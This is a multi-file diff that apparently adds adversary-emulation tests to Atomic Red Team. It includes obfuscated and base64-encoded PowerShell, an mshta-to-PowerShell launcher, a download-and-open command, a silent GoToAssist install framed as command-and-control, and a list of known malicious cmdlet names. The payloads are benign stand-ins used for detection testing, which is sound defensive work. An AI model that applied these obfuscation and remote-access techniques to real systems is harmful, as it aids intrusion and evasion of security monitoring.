+          -f''In'',''SiO'',''vOKe-EXp'',''ReS'',''n'') (  (&("{1}{2}{0}"-f''blE'',''gET-'',''vaRIA'')  (''CMdw''+''h''+''y''))."v`ALUe"::("{1}{0}"
+          -f''iN'',''jO'').Invoke('''',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163
+          , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40,
+          120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { (
+          [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
+
 '
        name: powershell
  T1218.008:
@@ -39273,8 +39313,7 @@ persistence:

 '
      supported_platforms:
-      - linux
-      - macos
+      - containers
      input_arguments:
        namespace:
          description: K8s namespace to list
@@ -39300,8 +39339,7 @@ persistence:

 '
      supported_platforms:
-      - linux
-      - macos
+      - containers
      input_arguments:
        namespace:
          description: K8s namespace to list
@@ -58011,8 +58049,7 @@ execution:

 '
      supported_platforms:
-      - linux
-      - macos
+      - containers
      input_arguments:
        namespace:
          description: K8s namespace to use
@@ -58102,8 +58139,7 @@ execution:

 '
      supported_platforms:
-      - linux
-      - macos
+      - containers
      input_arguments:
        namespace:
          description: K8s namespace to list
@@ -58129,8 +58165,7 @@ execution:

 '
      supported_platforms:
-      - linux
-      - macos
+      - containers
      input_arguments:
        namespace:
          description: K8s namespace to list
@@ -60105,6 +60140,55 @@ execution:
          -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute
          -ErrorAction Stop'
        name: powershell
+    - name: PowerShell Command Execution
+      auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598
+      description: 'Use of obfuscated PowerShell to execute an arbitrary command;
+        outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection
+        Report by Red Canary.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        obfuscated_code:
+          description: 'Defaults to: Invoke-Expression with a "Write-Host" line.'
+          type: string
+          default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==
+      executor:
+        command: 'powershell.exe -e  #{obfuscated_code}
+
+'
+        name: command_prompt
+    - name: PowerShell Invoke Known Malicious Cmdlets
+      auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3
+      description: Powershell execution of known Malicious PowerShell Cmdlets
+      supported_platforms:
+      - windows
+      input_arguments:
+        Malicious_cmdlets:
+          description: Known Malicious Cmdlets
+          type: String
+          default: '"Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword",
+            "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot",
+            "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection",
+            "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan",
+            "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode",
+            "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy",
+            "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy",
+            "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump",
+            "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy",
+            "Set-CriticalProcess", "Set-MasterBootRecord"
+
+'
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |-
+          $malcmdlets = #{Malicious_cmdlets}
+          foreach ($cmdlets in $malcmdlets) {
+              "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
+          foreach ($cmdlets in $malcmdlets) {
+              $cmdlets}
  T1059.006:
    technique:
      external_references:
@@ -61581,6 +61665,27 @@ execution:

 '
        name: command_prompt
+    - name: Suspicious Execution via Windows Command Shell
+      auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20
+      description: 'Command line executed via suspicious invocation. Example is from
+        the 2021 Threat Detection Report by Red Canary.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_file:
+          description: File to output to
+          type: string
+          default: hello.txt
+        input_message:
+          description: Message to write to file
+          type: string
+          default: Hello, from CMD!
+      executor:
+        command: "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file}
+          & type #{output_file}\n"
+        name: command_prompt
  T1047:
    technique:
      id: attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055
@@ -65221,6 +65326,27 @@ command-and-control:
        cleanup_command: 'rm -f #{output_file}

 '
+    - name: File Download via PowerShell
+      auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
+      description: 'Use PowerShell to download and write an arbitrary file from the
+        internet. Example is from the 2021 Threat Detection Report by Red Canary.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        target_remote_file:
+          description: File to download
+          type: string
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt
+        output_file:
+          description: File to write to
+          type: string
+          default: LICENSE.txt
+      executor:
+        command: "(New-Object Net.WebClient).DownloadString('#{target_remote_file}')
+          | Out-File #{output_file}; Invoke-Item #{output_file}\n"
+        name: powershell
  T1090.001:
    technique:
      external_references:
@@ -66242,6 +66368,23 @@ command-and-control:
          $file1 -ErrorAction Ignore"
        name: powershell
        elevation_required: true
+    - name: GoToAssist Files Detected Test on Windows
+      auto_generated_guid: 1b72b3bd-72f8-4b63-a30b-84e91b9c3578
+      description: 'An adversary may attempt to trick the user into downloading GoToAssist
+        and use to establish C2. Download of GoToAssist installer will be at the destination
+        location and ran when sucessfully executed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1"
+          $file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe"
+          Start-Process $file1 /S;
+        cleanup_command: try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{}
+        name: powershell
+        elevation_required: true
  T1132.001:
    technique:
      external_references:
@@ -22,6 +22,8 @@ Adversaries may also obfuscate commands executed from payloads or directly via a

 - [Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP](#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http)

+- [Atomic Test #7 - Obfuscated Command in PowerShell](#atomic-test-7---obfuscated-command-in-powershell)
+

 <br/>

@@ -266,4 +268,32 @@ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}



+<br/>
+<br/>
+
+## Atomic Test #7 - Obfuscated Command in PowerShell
+This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8b3f4ed6-077b-4bdd-891c-2d237f19410f
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
+```
+
+
+
+
+
+
 <br/>
@@ -150,3 +150,15 @@ atomic_tests:
    command: |
      Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
    name: powershell
+
+- name: Obfuscated Command in PowerShell
+  auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f
+  description: |
+    This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
+    name: powershell
+  
@@ -16,7 +16,7 @@ In Kubernetes, a CronJob may be used to schedule a Job that runs one or more con
 ## Atomic Test #1 - ListCronjobs
 Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.

-**Supported Platforms:** Linux, macOS
+**Supported Platforms:** Containers


 **auto_generated_guid:** ddfb0bc1-3c3f-47e9-a298-550ecfefacbd
@@ -49,7 +49,7 @@ kubectl get cronjobs -n #{namespace}
 ## Atomic Test #2 - CreateCronjob
 Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.

-**Supported Platforms:** Linux, macOS
+**Supported Platforms:** Containers


 **auto_generated_guid:** f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3
@@ -6,8 +6,7 @@ atomic_tests:
  description: |
    Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
  supported_platforms:
-  - linux
-  - macos
+  - containers
  input_arguments:
    namespace:
      description: K8s namespace to list
@@ -25,8 +24,7 @@ atomic_tests:
  description: |
    Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
  supported_platforms:
-  - linux
-  - macos
+  - containers
  input_arguments:
    namespace:
      description: K8s namespace to list
@@ -40,4 +38,4 @@ atomic_tests:
    cleanup_command: |
      kubectl delete cronjob art -n #{namespace}
    name: bash
-    elevation_required: false
+    elevation_required: false
@@ -46,6 +46,10 @@ PowerShell commands/scripts can also be executed without directly invoking the <

 - [Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments](#atomic-test-18---athpowershellcommandlineparameter--encodedcommand-parameter-variations-with-encoded-arguments)

+- [Atomic Test #19 - PowerShell Command Execution](#atomic-test-19---powershell-command-execution)
+
+- [Atomic Test #20 - PowerShell Invoke Known Malicious Cmdlets](#atomic-test-20---powershell-invoke-known-malicious-cmdlets)
+

 <br/>

@@ -768,4 +772,74 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force



+<br/>
+<br/>
+
+## Atomic Test #19 - PowerShell Command Execution
+Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a538de64-1c74-46ed-aa60-b995ed302598
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| obfuscated_code | Defaults to: Invoke-Expression with a "Write-Host" line. | string | JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+powershell.exe -e  #{obfuscated_code}
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #20 - PowerShell Invoke Known Malicious Cmdlets
+Powershell execution of known Malicious PowerShell Cmdlets
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 49eb9404-5e0f-4031-a179-b40f7be385e3
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| Malicious_cmdlets | Known Malicious Cmdlets | String | "Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord"|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$malcmdlets = #{Malicious_cmdlets}
+foreach ($cmdlets in $malcmdlets) {
+    "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
+foreach ($cmdlets in $malcmdlets) {
+    $cmdlets}
+```
+
+
+
+
+
+
 <br/>
@@ -374,4 +374,41 @@ atomic_tests:
      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
  executor:
    command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop'
-    name: powershell
+    name: powershell
+
+- name: PowerShell Command Execution
+  auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598
+  description: |
+    Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
+  supported_platforms:
+  - windows
+  input_arguments:
+    obfuscated_code:
+      description: 'Defaults to: Invoke-Expression with a "Write-Host" line.'
+      type: string
+      default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==
+  executor:
+    command: |
+      powershell.exe -e  #{obfuscated_code}
+    name: command_prompt
+
+- name: PowerShell Invoke Known Malicious Cmdlets
+  auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3
+  description: Powershell execution of known Malicious PowerShell Cmdlets
+  supported_platforms:
+  - windows
+  input_arguments:
+    Malicious_cmdlets:
+      description: Known Malicious Cmdlets 
+      type: String
+      default: |
+        "Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord"
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      $malcmdlets = #{Malicious_cmdlets}
+      foreach ($cmdlets in $malcmdlets) {
+          "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
+      foreach ($cmdlets in $malcmdlets) {
+          $cmdlets}
@@ -12,6 +12,8 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu

 - [Atomic Test #2 - Writes text to a file and displays it.](#atomic-test-2---writes-text-to-a-file-and-displays-it)

+- [Atomic Test #3 - Suspicious Execution via Windows Command Shell](#atomic-test-3---suspicious-execution-via-windows-command-shell)
+

 <br/>

@@ -101,4 +103,38 @@ del "#{file_contents_path}"



+<br/>
+<br/>
+
+## Atomic Test #3 - Suspicious Execution via Windows Command Shell
+Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d0eb3597-a1b3-4d65-b33b-2cda8d397f20
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | File to output to | string | hello.txt|
+| input_message | Message to write to file | string | Hello, from CMD!|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}
+```
+
+
+
+
+
+
 <br/>
@@ -52,3 +52,23 @@ atomic_tests:
    cleanup_command: |
      del "#{file_contents_path}"
    name: command_prompt
+
+- name: Suspicious Execution via Windows Command Shell
+  auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20
+  description: |
+    Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary.
+  supported_platforms:
+  - windows
+  input_arguments:
+    output_file:
+      description: File to output to
+      type: string
+      default: hello.txt
+    input_message:
+      description: Message to write to file
+      type: string
+      default: Hello, from CMD!
+  executor:
+    command: |
+      %LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}
+    name: command_prompt
@@ -32,6 +32,8 @@

 - [Atomic Test #14 - whois file download](#atomic-test-14---whois-file-download)

+- [Atomic Test #15 - File Download via PowerShell](#atomic-test-15---file-download-via-powershell)
+

 <br/>

@@ -589,4 +591,38 @@ echo "Please install timeout and the whois package"



+<br/>
+<br/>
+
+## Atomic Test #15 - File Download via PowerShell
+Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| target_remote_file | File to download | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt|
+| output_file | File to write to | string | LICENSE.txt|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}
+```
+
+
+
+
+
+
 <br/>
@@ -381,3 +381,23 @@ atomic_tests:
      timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
    cleanup_command: |
      rm -f #{output_file}
+
+- name: File Download via PowerShell
+  auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
+  description: |
+    Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.
+  supported_platforms:
+  - windows
+  input_arguments:
+    target_remote_file:
+      description: File to download
+      type: string
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt
+    output_file:
+      description: File to write to
+      type: string
+      default: LICENSE.txt
+  executor:
+    command: |
+      (New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}
+    name: powershell
@@ -30,6 +30,8 @@ Mshta.exe can be used to bypass application control solutions that do not accoun

 - [Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path](#atomic-test-9---invoke-html-application---simulate-lateral-movement-over-unc-path)

+- [Atomic Test #10 - Mshta used to Execute PowerShell](#atomic-test-10---mshta-used-to-execute-powershell)
+

 <br/>

@@ -423,4 +425,38 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force



+<br/>
+<br/>
+
+## Atomic Test #10 - Mshta used to Execute PowerShell
+Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8707a805-2b76-4f32-b1c0-14e558205772
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| message | Encoded message to include | string | Hello,%20MSHTA!|
+| seconds_to_sleep | How many seconds to sleep/wait | string | 5|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+mshta.exe "about:<hta:application><script language="VBScript">Close(Execute("CreateObject(""Wscript.Shell"").Run%20""powershell.exe%20-nop%20-Command%20Write-Host%20#{message};Start-Sleep%20-Seconds%20#{seconds_to_sleep}"""))</script>'"
+```
+
+
+
+
+
+
 <br/>
@@ -214,4 +214,24 @@ atomic_tests:
      Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
  executor:
    command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}'
-    name: powershell
+    name: powershell
+
+- name: Mshta used to Execute PowerShell
+  auto_generated_guid: 8707a805-2b76-4f32-b1c0-14e558205772
+  description: |
+    Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary.
+  supported_platforms:
+  - windows
+  input_arguments:
+    message:
+      description: Encoded message to include
+      type: string
+      default: Hello,%20MSHTA!
+    seconds_to_sleep:
+      description: How many seconds to sleep/wait
+      type: string
+      default: 5
+  executor:
+    command: |
+      mshta.exe "about:<hta:application><script language="VBScript">Close(Execute("CreateObject(""Wscript.Shell"").Run%20""powershell.exe%20-nop%20-Command%20Write-Host%20#{message};Start-Sleep%20-Seconds%20#{seconds_to_sleep}"""))</script>'"
+    name: command_prompt
@@ -0,0 +1,14 @@
+# GoTo Opener - delete registry install key because it can't be called by the system
+$InstalledApp = "GoTo Opener"
+$Keys = Get-ChildItem -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall -ErrorAction SilentlyContinue
+$Items = $Keys | Get-ItemProperty | where-object {$_.DisplayName -eq $InstalledApp}
+If ($Items) {
+    $KeyToDelete = $Items.PSPath
+    Remove-Item $KeyToDelete -Recurse -Force -ErrorAction SilentlyContinue
+}
+# GoTo Opener - delete user directories
+Get-ChildItem "C:\Users\*\AppData" "GoTo Opener" -Recurse -Force -ErrorAction SilentlyContinue | ForEach-Object {
+    $Directory = $_.ToString()
+    Remove-Item $Directory -Recurse -Force -ErrorAction SilentlyContinue
+    }
+Start-Process -FilePath "C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_uninstaller_expert.exe" -ArgumentList "/uninstall /silent" -Wait -PassThru | Out-Null
@@ -14,6 +14,8 @@ Admin tools such as TeamViewer have been used by several groups targeting instit

 - [Atomic Test #3 - LogMeIn Files Detected Test on Windows](#atomic-test-3---logmein-files-detected-test-on-windows)

+- [Atomic Test #4 - GoToAssist Files Detected Test on Windows](#atomic-test-4---gotoassist-files-detected-test-on-windows)
+

 <br/>

@@ -124,4 +126,38 @@ Remove-Item $file1 -ErrorAction Ignore



+<br/>
+<br/>
+
+## Atomic Test #4 - GoToAssist Files Detected Test on Windows
+An adversary may attempt to trick the user into downloading GoToAssist and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1b72b3bd-72f8-4b63-a30b-84e91b9c3578
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1"
+$file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe"
+Start-Process $file1 /S;
+```
+
+#### Cleanup Commands:
+```powershell
+try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{}
+```
+
+
+
+
+
 <br/>
@@ -55,3 +55,18 @@ atomic_tests:
    name: powershell
    elevation_required: true

+- name: GoToAssist Files Detected Test on Windows
+  auto_generated_guid: 1b72b3bd-72f8-4b63-a30b-84e91b9c3578
+  description: |
+    An adversary may attempt to trick the user into downloading GoToAssist and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1"
+      $file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe"
+      Start-Process $file1 /S;
+    cleanup_command: 
+      try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{}
+    name: powershell
+    elevation_required: true
